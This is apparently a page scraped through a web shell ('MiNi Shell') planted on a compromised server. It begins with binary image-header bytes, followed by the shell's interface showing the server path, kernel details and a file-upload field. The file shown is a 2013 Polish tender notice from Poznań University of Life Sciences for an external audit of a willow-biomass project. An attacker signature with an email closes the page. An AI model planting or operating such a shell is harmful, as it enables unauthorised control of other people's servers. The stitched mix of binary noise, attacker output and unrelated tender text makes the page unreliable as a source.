JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130205/47956-N-2013.html

<p class="kh_header"><b>Poznań: Przeprowadzenie usługi audytu zewnętrznego projektu pt.: 
Uprawy odmian wierzby na nieużytkach oraz na terenach zdegradowanych i chemicznie zanieczyszczonych, celem efektywnego pozyskania biomasy, surowca budowlanego i energetycznego oraz fitoremediacji środowiska wraz ze sprawozdaniem i opinią o projekcie.</b><br>
<b>Numer ogłoszenia: 47956 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Poznaniu , ul. Wojska Polskiego 28, 60-637 Poznań, woj. wielkopolskie, tel. 061 8487023, 8487043, faks 061 8487043, 8487145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.au.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usługi audytu zewnętrznego projektu pt.: 
Uprawy odmian wierzby na nieużytkach oraz na terenach zdegradowanych i chemicznie zanieczyszczonych, celem efektywnego pozyskania biomasy, surowca budowlanego i energetycznego oraz fitoremediacji środowiska wraz ze sprawozdaniem i opinią o projekcie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie audytu zewnętrznego projektu rozwojowego nr 12-00-65-10 p.t. Uprawy odmian wierzby na nieużytkach oraz terenach zdegradowanych i chemicznie zanieczyszczonych, celem efektywnego pozyskania biomasy, surowca budowlanego i energetycznego oraz fitoremediacji środowiska- realizowanego w ramach projektu rozwojowego, zgodnie z umową nr 12-0065-10-2011 zawartą między Narodowym Centrum Badań i Rozwoju w Warszawie a Uniwersytetem Przyrodniczym, Wydziałem Technologii Drewna w Poznaniu, z dnia 03.03.2011r.za  okres  od  01.01.2011 r. do 30.09.2013 r. 2.1	Audyt należy przeprowadzić zgodnie z wytycznymi Rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 29 września 2011 w sprawie przeprowadzania audytu zewnętrznego wydatkowania środków na naukę (Dz. U. nr 207 poz. 1237), w szczególności warunki określone w § 2 ust 1 i 2.
2.2Zgodnie Dz. U. nr 207 poz. 1237 § 6 celem przeprowadzenia audytu jest wydanie przez audytora opinii na temat:
a.wiarygodności danych liczbowych i opisowych zawartych w dokumentach związanych z realizowanym projektem;
b.realizacji wydatków i uzyskania założonych efektów związanych z audytowanym projektem, zgodnie z wymaganiami zawartymi w umowie;
c.poprawności dokumentowania i ujęcia operacji gospodarczych w wyodrębnionej dla danego projektu ewidencji księgowej.
2.3Oprócz oceny prawidłowości realizacji projektu, audyt ma również na celu doradztwo w zakresie polepszania metod jego realizacji.
2.4Audytor będzie miał obowiązek przekazania kopii dokumentacji roboczych: notatek, kwestionariuszy oceny, list sprawdzających lub co najmniej wykazu badanych dokumentów i wykazu sporządzonych dokumentów. Zamawiający wymaga, aby audyt był prowadzony co najmniej poprzez analizę dokumentacji projektu, wywiady z pracownikami i wykonawcami. Ponadto Zamawiający wymaga zorganizowania spotkania otwierającego, zamykającego oraz wszelkich innych niezbędnych spotkań w trakcie prowadzenia audytu. Wszelka korespondencja między Zamawiającym a Wykonawcą powinna odbywać się z zachowaniem formy pisemnej.
3.Audyt projektu obejmuje sprawdzenie:
a.osiągnięcia celu  projektu oraz  zgodności realizacji projektu z umową;
b.poprawności księgowania wydatków poniesionych w ramach realizowanego projektu, ich zasadności, sposobu udokumentowania i wyodrębnienia w ewidencji księgowej;
c.płatności wydatków związanych z projektem;
d.wiarygodności i terminowości sprawozdań z realizacji projektu;
e.terminowości rozliczania otrzymanych środków finansowych na realizację projektu;
f.sposobu monitorowania realizacji celów projektu;
g.sposobu przechowywania i zabezpieczania  dokumentacji dotyczącej projektu;
h.przestrzegania przepisów o rachunkowości, zamówieniach publicznych i finansach publicznych, w tym w zakresie przestrzegania dyscypliny finansów publicznych;
i.realizacji wniosków i zaleceń z  wcześniejszych kontroli i audytów.
4.Opis projektu, który podlega audytowi:
Audytowi podlegają zadania wykonywane w ramach projektu rozwojowego: 
nr 12-00-65-10 p.t. Uprawy odmian wierzby na nieużytkach oraz terenach zdegradowanych i chemicznie zanieczyszczonych, celem efektywnego pozyskania biomasy, surowca budowlanego i energetycznego oraz fitoremediacji środowiska
4.1Doświadczenie polowe w Łężanach w tym: a) zabiegi agrotechniczne, obserwacje fenologiczne, pomiary biometryczne roślin wierzby, b) produkcja i pozyskiwanie surowca w wieku 2.- , 3.- oraz 4.- lat.
4.2Doświadczenie polowe na Nizinie Kwidzyńskiej, w tym: a) zabiegi agrotechniczne, obserwacje fenologiczne, pomiary biometryczne roślin wierzby, b) produkcja i pozyskiwanie surowca w wieku 4.-, 5.- oraz 6.- lat.
4.3Doświadczenie polowe: Siemianice, Zielonka, Bałdy; dobór klonów wierzb (taksonów) dla różnych siedlisk, w tym: a) potwierdzenie przynależności systematycznej około 160 taksonów, b) opracowanie katalogu posiadanych taksonów (z dokumentacją fotograficzną i opisem cech) oraz jego wydruk w 100 egzemplarzach w wersji polsko-angielskiej, c) przygotowanie powierzchni badawczej do wysadzenia wytypowanych taksonów (1 ha, przygotowanie gleby, ogrodzenie, deszczownia, wiata), d) pozyskanie materiału do badań (przygotowanie zrzezów), e) wysadzenie wierzb na poletkach doświadczalnych.
4.4Doświadczenie polowe: Siemianice, Zielonka, Bałdy; dobór klonów wierzb (taksonów) dla różnych siedlisk, w tym: produkcja i pozyskiwanie surowca w wieku 3 lat (dotyczy materiału wysadzonego w 2009 roku).
4.5Doświadczenie polowe: Siemianice, Zielonka, Bałdy: dobór klonów wierzb (taksonów) dla różnych siedlisk, w tym: a) zabiegi agrotechniczne, b) obserwacje fenologiczne, c) pomiary biometryczne roślin wierzby.
4.6Badanie właściwości fizyko-chemicznych oraz zawartości składników przyswajalnych w glebach.
4.7Analiza: wilgotności, popiołu, ciepła spalania i składu elementarnego drewna wierzby.
4.8Badania laboratoryjne: analiza zawartości metali ciężkich w materiale roślinnym i glebie.
4.9Badania z zakresu biochemii, genetyki oraz fizjologii roślin.
4.10Badania laboratoryjne: analiza parametrów fizyko-chemicznych drewna.
4.11Określenie dla wytypowanych odmian wierzby plantacyjnej udziału suchej masy prętów w różnym wieku oraz udziałów kory i drewna w prętach w tym. dla surowca 3.-, 4.- i 5.- letniego.
4.12Wytwarzanie płyt pilśniowych metodą mokrą w tym: a) określenie przy defibracji wydajności materiałowej w % oraz ilości substancji przechodzących do roztworu, oznaczanych jako sucha pozostałość w kg/kg s.m. surowca i jako ChZT wyrażone w <g02/kg s.m włókien pozyskanych w procesie rozwłókniania dla pozyskiwanego surowca 3-, 4- i 5-letniego, b) określenie wpływu różnych udziałów masy włóknistej z surowca wierzbowego na właściwości twardych i porowatych płyt pilśniowych, przy zachowaniu niezmienionej technologii wytwarzania w stosunku do stosowanej przy przerobie drewna sosny.
4.13	Wytwarzanie płyt wiórowych w tym: a) określenie w skali laboratoryjnej wpływu cząstek pozyskanych z surowca wierzbowego w skrawarce laboratoryjnej na właściwości jednowarstwowych płyt, b) określenie wpływu dodatku kleju na właściwości płyt o wytypowanym udziale procentowym rozdrobnionego surowca wierzbowego, C/ próby pozyskania cząstek z surowca wierzbowego na skrawarkach przemysłowych do wytwarzania wiórów na warstwę środkową, d) obserwacja zachowywania się rozdrobnionego surowca wierzbowego na urządzeniach ciągu produkcyjnego.
4.14	Płyty pilśniowe sucho formowane w tym: a) rozpoznanie wpływu cząstek zdefibrowanej kory z surowca wierzbowego, pochodzącego z plantacji na właściwości powierzchni gotowych płyt MDF, b) rozpoznanie wpływu masy włóknistej z surowca wierzbowego na proces zaklejania wzmacniającego, c) optymalizacja warunków zaklejania mieszaniny włókien z drewna sosny i surowca wierzbowego pochodzącego z plantacji.
5.Całkowita wartość projektu wg umowy z NCBiR wynosi 3 163 849 PLN
6.Dokumentacja dotycząca projektu m. in.:
a.wnioski o wypłacenie zaliczki 
b.umowy z wykonawcami;
c.aneksy do umów
d.faktury
oraz inne dokumenty niezbędne do przeprowadzenia badania audytowego.
7.Miejsce dotyczące przechowywania dokumentacji projektu:
Oryginały dokumentacji projektu są przechowywane w  siedzibie Uniwersytetu Przyrodniczego w Poznaniu, 60-637 Poznań, ul. Wojska Polskiego 28.
8.Zakres audytu:
a.gotowość organizacyjną beneficjenta i jego procedury wewnętrzne,
b.audyt finansowy,
c.audyt realizacji projektu,
d.wizyta na miejscu realizacji projektu,
e.prawidłowość i rzetelność prowadzenia i archiwizowania dokumentacji,
f.wdrażanie zaleceń pokontrolnych,
g.analiza powodzenia projektu.
9.Na podstawie zebranych dowodów audytor sporządzi pisemne sprawozdanie z audytu, zgodnie z Dz. U. nr 207 poz. 1237 § 13. 1. zwane dalej sprawozdaniem. 
10.Zgodnie z Dz. U. nr 207 poz. 1237 § 14. 1. sprawozdanie zawierać będzie: 
a.datę sporządzenia;
b.nazwę i adres audytowanego podmiotu;
c.nazwę i numer projektu - w  przypadku  audytu projektu;
d.oświadczenie audytora o niezależności od audytowanego podmiotu;
e.imiona, nazwiska i określenie uprawnień  audytorów;
f.cele  audytu;
g.podmiotowy i przedmiotowy zakres audytu;
h.termin, w którym przeprowadzono audyt;
i.zwięzły    opis  działań  audytowanego   podmiotu w obszarze objętym audytem;
j.ocenę adekwatności i skuteczności systemu zarządzania i kontroli w  obszarze działalności  audytowanego podmiotu objętym audytem;
k.informację o  metodzie doboru i wielkości  próby do badania;
l.zaprezentowanie   wyników  badania,   w   których stwierdzono nieprawidłowości;
m.określenie kwoty uzyskanych, rozliczonych i przechodzących na  kolejny rok  środków dotacji statutowej;
n.określenie kwoty nierozliczonych środków dotacji statutowej podlegających zwrotowi;
o.określenie nieprawidłowości w działalności audytowanego  podmiotu  oraz   analizę  ich   przyczyn i skutków;
p.zalecenia w sprawie usunięcia stwierdzonych nie- prawidłowości w działalności audytowanego pod- miotu;
q.podpisy audytorów, a  w  przypadku gdy  audytorem jest  osoba prawna albo jednostka  organizacyjna nieposiadająca osobowości  prawnej nazwę jednostki. 
11.Wykonawca przedłoży sprawozdanie ostateczne w 3 egzemplarzach, w języku polskim w formie pisemnej oraz załączy w w sprawozdanie na płycie CD. Zakres i sposób sporządzenia sprawozdania został opisany w (Dz. U. nr 207 poz. 1237)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 79.21.21.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium i zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych,  minimum dwóch audytów finansowanych zgodnie z Dz. U. nr 207 poz. 1237 § 7. tj. z projektów badawczych Narodowego Centrum Badań i Rozwoju lub Narodowego Centrum Nauki, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (załącznik nr 4) oraz załączeniem dokumentu (np. referencje, zaświadczenie wystawione przez podmiot zlecające badania audytowe) potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie, (na potwierdzenie warunku określonego w rozdziale VIII pkt 3 niniejszej SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	wypełniony formularz oferty - załącznika nr 1,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w następujących przypadkach:
1.zmiany zasad dokonywania odbioru przedmiotu zamówienia;
2.zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymania realizacji zamówienia przez Zamawiającego;
3.	siły wyższej uniemożliwiającej wykonanie zamówienia;
4.	w przypadku wystąpienia którejkolwiek z okoliczności wskazanej w pkt. 1, 3, termin wykonania umowy może ulec odpowiedniemu wydłużeniu o czas niezbędny do wykonania umowy w sposób należyty;
5.	zmiany terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up. poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać w formie papierowej od Zamawiającego w budynku Collegium Maximum Uniwersytetu Przyrodniczego ul. Wojska Polskiego 28, IV piętro pok. 407 w godz. 10:00 do 12:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 09:00, miejsce: w budynku Collegium Maximum Uniwersytetu Przyrodniczego w Poznaniu ul. Wojska Polskiego 28, IV piętro pok. 407  Biuro Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com